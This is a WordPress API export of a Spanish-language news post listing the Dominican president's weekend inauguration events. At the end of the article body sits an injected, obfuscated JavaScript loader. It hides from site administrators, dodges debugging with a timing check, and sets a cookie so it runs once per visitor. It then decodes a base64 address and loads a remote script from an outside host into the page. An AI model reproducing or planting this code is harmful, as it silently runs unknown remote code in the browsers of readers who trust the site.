{"id":13519,"date":"2023-01-21T12:07:51","date_gmt":"2023-01-21T16:07:51","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=13519"},"modified":"2023-01-21T12:07:51","modified_gmt":"2023-01-21T16:07:51","slug":"presidente-abinader-continua-este-fin-de-semana-su-programa-de-inauguraciones","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=13519","title":{"rendered":"Presidente Abinader contin\u00faa este fin de semana su programa de inauguraciones"},"content":{"rendered":"<p>Santo Domingo.-\u00a0<strong>El Presidente Luis Abinader<\/strong>\u00a0contin\u00faa este s\u00e1bado y domingo con el programa de\u00a0<strong>inauguraciones<\/strong>\u00a0de obras que inici\u00f3 desde la primera semana de enero y que,\u00a0<strong>seg\u00fan lo programado, ser\u00e1 todo el a\u00f1o.<\/strong><\/p>\n<p><strong>S\u00e1bado 21 &#8211; La Altagracia<\/strong><\/p>\n<p>El mandatario llegar\u00e1 a las 9:45 de la ma\u00f1ana a la Bas\u00edlica de Hig\u00fcey, donde se celebrar\u00e1 la\u00a0<strong>misa en honor a la Virgen de La Altagracia.<\/strong><\/p>\n<p>Al t\u00e9rmino de la misma, el Presidente encabezar\u00e1 la inauguraci\u00f3n de la\u00a0<strong>carretera El Mamey-Las Yayas<\/strong>\u00a0y asistir\u00e1 a la inauguraci\u00f3n del\u00a0<strong>proyecto residencial Taveras<\/strong>\u00a0en el sector La Malena.<\/p>\n<p>Del mismo modo, dejar\u00e1 iniciada la remodelaci\u00f3n del\u00a0<strong>muelle pesquero de Boca de Yuma.\u00a0<\/strong><\/p>\n<p><strong>Domingo 22 &#8211; S\u00e1nchez Ram\u00edrez<\/strong><\/p>\n<p>A las 10:30 de la ma\u00f1ana del domingo, el Presidente Abinader visitar\u00e1 el\u00a0<strong>programa Primero T\u00fa,<\/strong>\u00a0de PROPEEP.<\/p>\n<p>Luego continuar\u00e1 desarrollando una serie de inauguraciones que iniciar\u00e1n con una\u00a0<strong>planta de tratamiento junto al INAPA<\/strong>, para m\u00e1s tarde encabezar la inauguraci\u00f3n de la\u00a0<strong>carretera La Mata, Angelina, La Bija, Fantino<\/strong>\u00a0y, posteriormente, un\u00a0<strong>plantel escolar<\/strong>\u00a0en el distrito municipal de\u00a0<strong>Hernando Alonzo.<\/strong><\/p>\n<p>As\u00ed mismo, el jefe de Estado sostendr\u00e1 un\u00a0<strong>almuerzo con la Asociaci\u00f3n de Ganaderos.<\/strong><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Santo Domingo.-\u00a0El Presidente Luis Abinader\u00a0contin\u00faa este s\u00e1bado y domingo con el programa de\u00a0inauguraciones\u00a0de obras que inici\u00f3 desde la primera semana de enero y que,\u00a0seg\u00fan lo programado, ser\u00e1 todo el a\u00f1o. S\u00e1bado 21 &#8211; La Altagracia El mandatario llegar\u00e1 a las 9:45 de la ma\u00f1ana a la Bas\u00edlica de Hig\u00fcey, donde se celebrar\u00e1 la\u00a0misa en honor [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":13521,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-13519","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13519","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13519"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13519\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/13521"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13519"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13519"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13519"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}